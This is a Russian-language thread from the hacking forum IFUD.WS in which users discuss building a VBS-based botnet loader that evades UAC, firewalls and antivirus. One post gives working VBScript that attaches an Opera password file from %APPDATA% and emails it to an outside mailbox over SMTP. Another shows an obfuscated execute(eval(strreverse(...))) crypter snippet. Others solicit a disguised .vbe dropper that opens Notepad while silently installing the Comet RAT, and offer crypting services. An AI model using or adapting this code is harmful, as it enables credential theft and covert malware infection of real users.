1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

vbs, критика, и муки выбора ботнета.

Тема в разделе "Помощь по всем вопросам.", создана пользователем EEjester, 8 мар 2015.

  1. TopicStarter Overlay
    EEjester

    EEjester hack_the_god

    Регистрация:
    25 окт 2012
    Сообщения:
    1.339
    Симпатии:
    957
    вообщем так мои дорогие! повозился с vbs скриптами и понял что я не обнаружил в них минусов! UAC обходит, фаерволы обходит, все антивирусы и песочницы в рот шатает!!! в связи с этим решил поднять свой новый ботнет (лоадер). выбор пал на Please login or register to view links
    очень понравился! все что нужно в нем имеется. хочу услышать от вас минусы использования vbs, и возможно вы уже использовали подобные ботнеты? вообще давайти все это дело обсудим.
     
    • Like Like x 1
    Метки:
  2. ponchic

    ponchic юзверь

    Регистрация:
    15 дек 2013
    Сообщения:
    407
    Симпатии:
    276
    У меня один раз на виртуалке Хр не запустился:( (защиты не было)
     
  3. TopicStarter Overlay
    EEjester

    EEjester hack_the_god

    Регистрация:
    25 окт 2012
    Сообщения:
    1.339
    Симпатии:
    957
    на xp не запускается vbs?
     
  4. ponchic

    ponchic юзверь

    Регистрация:
    15 дек 2013
    Сообщения:
    407
    Симпатии:
    276
    Может и запускается, у меня виртуалка была вин хр х32 , но это была сборка с всяким говном (довольно глючная)
    Это я как-то чистил лодыр, но на вин 8 х64 - ок.
     
  5. TopicStarter Overlay
    EEjester

    EEjester hack_the_god

    Регистрация:
    25 окт 2012
    Сообщения:
    1.339
    Симпатии:
    957
    ну и пофиг на xp как то. главное что на w7 и w8 работает. еще у vbs есть какие то минусы? кто знает?
     
  6. ponchic

    ponchic юзверь

    Регистрация:
    15 дек 2013
    Сообщения:
    407
    Симпатии:
    276
    Любой angrychild сможет открыть его нотепаде и найти куда стучит/файл который должен скачатся.
     
  7. ResH

    ResH Команда форума

    Регистрация:
    26 июл 2012
    Сообщения:
    1.676
    Симпатии:
    2.268
    помню как в детстве из паблик материалов создал vbs который крал любые файлы и отправлял мне на мыло :grimacing:

    Код:
    on error resume next
    Set S = CreateObject("Wscript.Shell")
    set FSO=createobject("scripting.filesystemobject")
    Call SendPost("smtp.mail.ru","xxxxx@mail.ru","xxxxx2@mail.ru","Пароли от Браузера","")
    Function SendPost(strSMTP_Server,strTo,strFrom,strSubject,strBody)
    Set iMsg=CreateObject("CDO.Message")
    Set iConf=CreateObject("CDO.Configuration")
    Set Flds=iConf.Fields
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing")=2
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate")=1
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername")="xxxxx2"
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword")="0000"
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver")="smtp.mail.ru"
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport")=25
    Flds.Update
    iMsg.Configuration=iConf
    iMsg.To=strTo
    iMsg.From=strFrom
    iMsg.Subject=strSubject
    iMsg.TextBody=strBody
    iMsg.AddAttachment "%APPDATA%\Opera\Opera\123\1.txt"
    iMsg.Send
    End Function
    Set iMsg=Nothing
    Set iConf=Nothing
    Set Flds=Nothing
    
    а файлом был текстовый файл где хранились пассы от оперы
    вот старая тулза которая показывала пассы от оперы Please login or register to view links
    с помощи батника экспортировал пассы в текстовый файл
    а вбс при запуске сначала запускал данный батник потом отправлял на мыло пассы :mask:
    кстати их и криптовать не нужно , так как все легально было )))
    кстати Ежестер у меня есть вбс криптор , если нужно будет криптовать что то обращайся
     
    • Like Like x 1
  8. TopicStarter Overlay
    EEjester

    EEjester hack_the_god

    Регистрация:
    25 окт 2012
    Сообщения:
    1.339
    Симпатии:
    957
    не забывай о крипторах)) криптованный vbs выглядит так:
    Код:
    execute(eval(strreverse(")852-863(rhc+)062-173
    (rhc+)95-461(rhc+)992-514(rhc+)912-813(rhc+)
    272-283(rhc+)82-541(rhc+)902-972(rhc+)672-803
    (rhc+)003-004(rhc+)29-202(rhc+)512-482................................
    
     
    • Like Like x 1
  9. Grek

    Grek Команда форума

    Регистрация:
    14 ноя 2012
    Сообщения:
    1.458
    Симпатии:
    1.439
    я тоже перехожу на VBS так как там на много лучше хотя я его не изучал. но криптор попробую замутить
     
    • Like Like x 2
  10. cydd9_dred

    cydd9_dred

    Регистрация:
    22 янв 2013
    Сообщения:
    398
    Симпатии:
    306
    как сделать что бы после открытия file.vbe открывался блокнот с содержимым + тихо ставилась комета? (:
    Желательно что бы вес file.vbe был до 10кб. Кто может сделать пишите в ЛС цену.
     
    • Like Like x 1
  11. savinov798

    savinov798

    Регистрация:
    21 дек 2013
    Сообщения:
    138
    Симпатии:
    62
    [QмE="CyDD9_DreD, post: 59927, member: 1692"]как сделать что бы после открытия file.vbe открывался блокнот с содержимым + тихо ставилась комета? (:
    Желательно что бы вес file.vbe был до 10кб. Кто может сделать пишите в ЛС цену.[/QUOTE]
    .е. Тебе надо чтобы скрытно ставилась комета и открывался блокнот?если я так понял ,то в лс напиши ,это просто
     
  12. VasiaPechkin

    VasiaPechkin Ананасик

    Регистрация:
    11 июн 2014
    Сообщения:
    206
    Симпатии:
    253
    Криптовать VBS намного проще)
    Я юзал несколько VBS-ратов, отстук был)
     
    • Like Like x 1
  13. TopicStarter Overlay
    EEjester

    EEjester hack_the_god

    Регистрация:
    25 окт 2012
    Сообщения:
    1.339
    Симпатии:
    957
    знает кто vbs на виндовс 10 работает?
     

Поделиться этой страницей

Загрузка...